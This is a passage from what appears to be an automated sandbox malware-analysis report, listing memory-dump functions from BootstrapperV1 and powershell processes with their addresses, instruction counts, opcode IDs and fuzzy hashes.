                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b6cb73f2b39a5ae60aedc1fd995f5da847e428ae89183463d976edde4b5016e4
                                                                                                                                                        • Instruction ID: b0dbb0794e3072a983194884628f5b88fdf51c6b4c5c149a76a7f6b052354eb7
                                                                                                                                                        • Opcode Fuzzy Hash: b6cb73f2b39a5ae60aedc1fd995f5da847e428ae89183463d976edde4b5016e4
                                                                                                                                                        • Instruction Fuzzy Hash: 8BE092A141E3C14FE30A976448651E9BFA0AF87314F8846EEE4C9CB193C56C814AC382
                                                                                                                                                        Function 00007FFAAC5ABCD8 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d7acbdae6786d8bfa4e32eb10b7b6d979de4a4999b3b8e3830c30d45a9f66bdb
                                                                                                                                                        • Instruction ID: 034be9b474c37b5f42b66163d958ac04df980e2e4df8daaec2a54342e0a7e48c
                                                                                                                                                        • Opcode Fuzzy Hash: d7acbdae6786d8bfa4e32eb10b7b6d979de4a4999b3b8e3830c30d45a9f66bdb
                                                                                                                                                        • Instruction Fuzzy Hash: FAE0D85194F6C74AF745872E0C697642E85AF53120FC882F9E54DC71D3EC08C80C83C1
                                                                                                                                                        Function 00007FFAAC598150 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a02ee4ac7dacd33d3584b1e297ff8b1f46de25416fe96364621cbe6da7dea19b
                                                                                                                                                        • Instruction ID: 993dec60a6da63ac626bfd903271996b11a480d083d1a25b6120bea49461ec23
                                                                                                                                                        • Opcode Fuzzy Hash: a02ee4ac7dacd33d3584b1e297ff8b1f46de25416fe96364621cbe6da7dea19b
                                                                                                                                                        • Instruction Fuzzy Hash: 2FE02B29E5BD4B47EECCA5298C5342039E1EBAA204FE840EDD40CC3185FD1FC88A8385
                                                                                                                                                        Function 00007FFAAC5959D0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: de468debe682384a4ada51a86ca342db9928b04da778ab81132a384b1a51b698
                                                                                                                                                        • Instruction ID: b1e5e72b852e8724a54b64e98736d395d6e0552085dfcdb2937a6b5878c3ac0b
                                                                                                                                                        • Opcode Fuzzy Hash: de468debe682384a4ada51a86ca342db9928b04da778ab81132a384b1a51b698
                                                                                                                                                        • Instruction Fuzzy Hash: 11E0C23085AA4787FB08AB324C4507A71D1BB88211F888AB6EC8CC0090FB2DC3C98282
                                                                                                                                                        Function 00007FFAAC59EE20 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a30874bde97ddbd41498ae9fd105467cfb667529a8279b936e9616ea51ee8ad4
                                                                                                                                                        • Instruction ID: 35508a7da7db975dcfa24ac0e8b130563dc56f8894a346f0423783604a0a352e
                                                                                                                                                        • Opcode Fuzzy Hash: a30874bde97ddbd41498ae9fd105467cfb667529a8279b936e9616ea51ee8ad4
                                                                                                                                                        • Instruction Fuzzy Hash: 9AE04F2055F6C79FDF42B7B848060C47BD05F0729478880E9D048CB0A2E54D484D8312
                                                                                                                                                        Function 00007FFAAC5959E0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d606a3eff54a8afc23c6f3d9692f99aba78f197071398acf0b125e50e4cf453a
                                                                                                                                                        • Instruction ID: 876f8d1e1d7426b00a654f9409250045ebd45522b7613f8fa5099eb3d4f2a61c
                                                                                                                                                        • Opcode Fuzzy Hash: d606a3eff54a8afc23c6f3d9692f99aba78f197071398acf0b125e50e4cf453a
                                                                                                                                                        • Instruction Fuzzy Hash: B5D02B30828D1646FB54B33C50086F567C0CB56310F0406B7FC0DD22E0DC4EE98502C5
                                                                                                                                                        Function 00007FFAAC5904D8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e0605087638f947f471bb6750a9460f71dabf2bd20ec94612bd0883ccacc6f50
                                                                                                                                                        • Instruction ID: 795bb29965e449bbab761215d6d5a869e9406c65a75e94588944ca19ce022c25
                                                                                                                                                        • Opcode Fuzzy Hash: e0605087638f947f471bb6750a9460f71dabf2bd20ec94612bd0883ccacc6f50
                                                                                                                                                        • Instruction Fuzzy Hash: 31D0A712A9A82E09FAA833ADF0053F86088DF4A610F4041F7F40DD21C7DC8D5C8602D1
                                                                                                                                                        Function 00007FFAAC5AB81B Relevance: .0, Instructions: 17COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4359b9667766aabe86bef7fcd41b57be476a211f51df856423158e4064a2a747
                                                                                                                                                        • Instruction ID: ae828956f7b7cede2fe31e0f4d6a8a28bafc11db4c01216c9e1b129f6d9c844e
                                                                                                                                                        • Opcode Fuzzy Hash: 4359b9667766aabe86bef7fcd41b57be476a211f51df856423158e4064a2a747
                                                                                                                                                        • Instruction Fuzzy Hash: 2DD0A711B58E09078564A73CA8001AAA2D1EB843307408776D01BC32C9EE2894434381
                                                                                                                                                        Function 00007FFAAC593B33 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c9838e51c598b0b4f8d18f9569f7d327ffb67589357cb5876311d14c4a714a12
                                                                                                                                                        • Instruction ID: 2ac93a26b74563683cf47f282685b7ff6de0abac1018fdd4eb3e63ec51ff8fc4
                                                                                                                                                        • Opcode Fuzzy Hash: c9838e51c598b0b4f8d18f9569f7d327ffb67589357cb5876311d14c4a714a12
                                                                                                                                                        • Instruction Fuzzy Hash: 75D05B3190894ECFEFC4DF5CD4619ADFBB1EB9B300F104155E11CD35D2C62498458780
                                                                                                                                                        Function 00007FFAAC593B59 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                        • Instruction ID: 9e81c14e39574058c124983491c99b5d0fbb472f09bf22b8e8dffdb658d4e1ee
                                                                                                                                                        • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                        • Instruction Fuzzy Hash: EEC01232A4580D8E9F80EB8CA0016ECBBA0EB8A221F081032E10DE2200CA2554544790

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC5985FA Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^#$M_^$
                                                                                                                                                        • API String ID: 0-3697010251
                                                                                                                                                        • Opcode ID: 0994cab780b5ece05cb381b6c4879c0e6fef08567a648d6cb1ca2a5b375b851f
                                                                                                                                                        • Instruction ID: 000bfad20605a1e42aa73b809f516f55975fd77d0122fdc015e73e7bd193135d
                                                                                                                                                        • Opcode Fuzzy Hash: 0994cab780b5ece05cb381b6c4879c0e6fef08567a648d6cb1ca2a5b375b851f
                                                                                                                                                        • Instruction Fuzzy Hash: F231D2B3D5E657CAF22A6619E4040A4B7D4AF22325F4987F6D06DCA1D3BD1EB80842C1
                                                                                                                                                        Function 00007FFAAC598BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                        • API String ID: 0-1397233021
                                                                                                                                                        • Opcode ID: 6b1b77d5fc1c030e5cb09ff5c9a764954e6e33477e91594cf5e6aa3da01898a9
                                                                                                                                                        • Instruction ID: 2dbcd2aab1d6e36a72db4d0304df841bd1da1172deae87e7b165390bab46ac65
                                                                                                                                                        • Opcode Fuzzy Hash: 6b1b77d5fc1c030e5cb09ff5c9a764954e6e33477e91594cf5e6aa3da01898a9
                                                                                                                                                        • Instruction Fuzzy Hash: C62185F394A687CFF34A471D8C6E0A57BD4EF2121878E42F5E05DCB193FD19940A4681
                                                                                                                                                        Function 00007FFAAC598BF8 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                                                                        • API String ID: 0-1397233021
                                                                                                                                                        • Opcode ID: 751f715fe1f50b5e670cd57fa833168263d5768d9f59de02df4d3f94640838c7
                                                                                                                                                        • Instruction ID: eea7fdc3aaef0c5307416eeaf9d6cc548e976f1ddecaaf9b04544dba289dc0f7
                                                                                                                                                        • Opcode Fuzzy Hash: 751f715fe1f50b5e670cd57fa833168263d5768d9f59de02df4d3f94640838c7
                                                                                                                                                        • Instruction Fuzzy Hash: 972194B394A683CFF24A472D886E0A53FD4EF2131874E42F5E05D8B193FD1DA40A4681

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC58644D Relevance: .7, Instructions: 733COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fd256994c9ecdbc561070e206d9422e1a15dec266b4ddf87e6aa8a953a45cb46
                                                                                                                                                        • Instruction ID: 13ec98312dc56f89611b463633c08ba61c1f3b8f2f8b3cf0caad49eed02db02c
                                                                                                                                                        • Opcode Fuzzy Hash: fd256994c9ecdbc561070e206d9422e1a15dec266b4ddf87e6aa8a953a45cb46
                                                                                                                                                        • Instruction Fuzzy Hash: BBD15C30A18A4E8FEF85DF58C455AA97BE1FF69300F14816AE40DD7296CE34E885CBC1
                                                                                                                                                        Function 00007FFAAC656605 Relevance: .4, Instructions: 444COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1358351985.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b32e42112bb97faf1e181dfab0cf471bf86df096b9d56dcc4fb4c97c3f1ec41e
                                                                                                                                                        • Instruction ID: fab761beae930f48a6d18502d04ac29e7bd43f69aa4dc3802c85ed73673c4432
                                                                                                                                                        • Opcode Fuzzy Hash: b32e42112bb97faf1e181dfab0cf471bf86df096b9d56dcc4fb4c97c3f1ec41e
                                                                                                                                                        • Instruction Fuzzy Hash: 2FD1367190EB8E8FF796D76888555B57FA0EF42310B2851BEE04DC72D3DA28D809C392
                                                                                                                                                        Function 00007FFAAC46E380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357447459.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2b1d395f483e6ddbd6f8e37ea74f818fb1c02cf334ef0ba3b87a9ff0a0cbb0e1
                                                                                                                                                        • Instruction ID: 7e469558a1f32b09f5d4a8a6ccf7fc1f89dffcbec39e5698fd0be97e4aaf873f
                                                                                                                                                        • Opcode Fuzzy Hash: 2b1d395f483e6ddbd6f8e37ea74f818fb1c02cf334ef0ba3b87a9ff0a0cbb0e1
                                                                                                                                                        • Instruction Fuzzy Hash: 2D41237080EBC48FE7568B2998459523FF0EF53324B1505EFE08CCB1A7D625E84AC792
                                                                                                                                                        Function 00007FFAAC58A01F Relevance: .1, Instructions: 126COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: cc643459f0823a193bac91a74898b6afc6a31a284f0a96e902912698f3a3c3e3
                                                                                                                                                        • Instruction ID: 25f1fe7d063e4de15e4318f05acfcbbf8d2eb289f3e8585454b50bbe21afcf56
                                                                                                                                                        • Opcode Fuzzy Hash: cc643459f0823a193bac91a74898b6afc6a31a284f0a96e902912698f3a3c3e3
                                                                                                                                                        • Instruction Fuzzy Hash: 114116B3C4E687CBF351AB6C98A65F53BA0DF12315F1881B2E08DD61A3ED18E54993C1
                                                                                                                                                        Function 00007FFAAC589789 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d006d8dca7131a8c758b5ca7caa763f2b6729bd16c032f080d6567e7239116f9
                                                                                                                                                        • Instruction ID: 58d4754f5b937bc4c8169bcb47cc77bc930226809ae1e5940612f17c82749c37
                                                                                                                                                        • Opcode Fuzzy Hash: d006d8dca7131a8c758b5ca7caa763f2b6729bd16c032f080d6567e7239116f9
                                                                                                                                                        • Instruction Fuzzy Hash: 2A31847191CB4C8FDB58DB5CA8466B9BBE0FB99311F00822FE449D3251CA70A9558BC2
                                                                                                                                                        Function 00007FFAAC58A47C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0dd0055914635cf68aada83f1e0e23b69acf90a33d930ae31ca1e0d06619ff9a
                                                                                                                                                        • Instruction ID: 9b388d2f8b963a501aa44d96a106ad42f8f0b29eb60f615d0085baf5ffc24434
                                                                                                                                                        • Opcode Fuzzy Hash: 0dd0055914635cf68aada83f1e0e23b69acf90a33d930ae31ca1e0d06619ff9a
                                                                                                                                                        • Instruction Fuzzy Hash: 15212B3090DB4C8FEB59DBAC984A7E97FE0EB96320F04416BD048C3162DA749419C791
                                                                                                                                                        Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1357871941.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction ID: 31d55e4f8b66ca5e5f16fd8237a1d02646902d463fb5189d0446cab783842ff9
                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction Fuzzy Hash: CC01677115CB0D8FD744EF0CE451AB5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                        Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1358351985.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 37cb412a2726bdc68a5d8c6d0d0d9c1d179d3a2dc1a58a5623c35c14282bf3b1
                                                                                                                                                        • Instruction ID: 4a948fb21da50eae2cf21dfb88c943f67b1c500159da2a505b3ae4acec2785c4
                                                                                                                                                        • Opcode Fuzzy Hash: 37cb412a2726bdc68a5d8c6d0d0d9c1d179d3a2dc1a58a5623c35c14282bf3b1
                                                                                                                                                        • Instruction Fuzzy Hash: FEF09A32A4D5088FE669EB5CE4418A877E0EF56320B2150BAE05DC75A3CE25EC44C780
                                                                                                                                                        Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1358351985.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: cfee42c2121c205c163e89cb71bdd17e39975c46f36f03ac35da43220e28bd23
                                                                                                                                                        • Instruction ID: 05be57c49cf1c3140b9f2e1bb6e94b5f5dce41234e40c6d1a7bea8d9681e237f
                                                                                                                                                        • Opcode Fuzzy Hash: cfee42c2121c205c163e89cb71bdd17e39975c46f36f03ac35da43220e28bd23
                                                                                                                                                        • Instruction Fuzzy Hash: 6FF0E232A8D5488FE759EB1CE0419A877E0FF06320B1150FAE04DCB463CE25EC84C780
                                                                                                                                                        Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000010.00000002.1358351985.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC58644D Relevance: .7, Instructions: 734COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 633d599a9b5009cd9d84ed21fce7aae3f0b77a0dec99b710c9684004d6d2a8d1
                                                                                                                                                        • Instruction ID: feb33b9dfff1d0aa93beec346bfb7c66b044c33ee256c39829f9fd112d4fb062
                                                                                                                                                        • Opcode Fuzzy Hash: 633d599a9b5009cd9d84ed21fce7aae3f0b77a0dec99b710c9684004d6d2a8d1
                                                                                                                                                        • Instruction Fuzzy Hash: A9D15E30A58A4E8FEF84DF58C455AA97BE1FF69300F14816AE40DD7296CE34E985CBC1
                                                                                                                                                        Function 00007FFAAC656605 Relevance: .4, Instructions: 444COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1467016932.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8f1de6d40f76c93ecaf2eed26a20f56d40c2a74546eefeb63ebdb7ac7a4d483a
                                                                                                                                                        • Instruction ID: e82583612f12fd54efccdfcbbf7787d113263810b6a7db9094cf7bef396f4879
                                                                                                                                                        • Opcode Fuzzy Hash: 8f1de6d40f76c93ecaf2eed26a20f56d40c2a74546eefeb63ebdb7ac7a4d483a
                                                                                                                                                        • Instruction Fuzzy Hash: F3D1266590EB8E8FF796D76888555B57FA0EF42310B2851BED04DC72D3DA28D809C392
                                                                                                                                                        Function 00007FFAAC589885 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7efaa158b3abb11c11d945693e8882fb1935473e5d01a8946254408d4940d9dd
                                                                                                                                                        • Instruction ID: 0403e6713409bd86c6d56671a17213d54fd0906e699cd10dc9aeab40b5783df7
                                                                                                                                                        • Opcode Fuzzy Hash: 7efaa158b3abb11c11d945693e8882fb1935473e5d01a8946254408d4940d9dd
                                                                                                                                                        • Instruction Fuzzy Hash: AC51A831A1CB498FDB1C9F5C98466B8BBE0FB59721F10422FE04993651CB75B856CBC2
                                                                                                                                                        Function 00007FFAAC589780 Relevance: .1, Instructions: 131COMMON
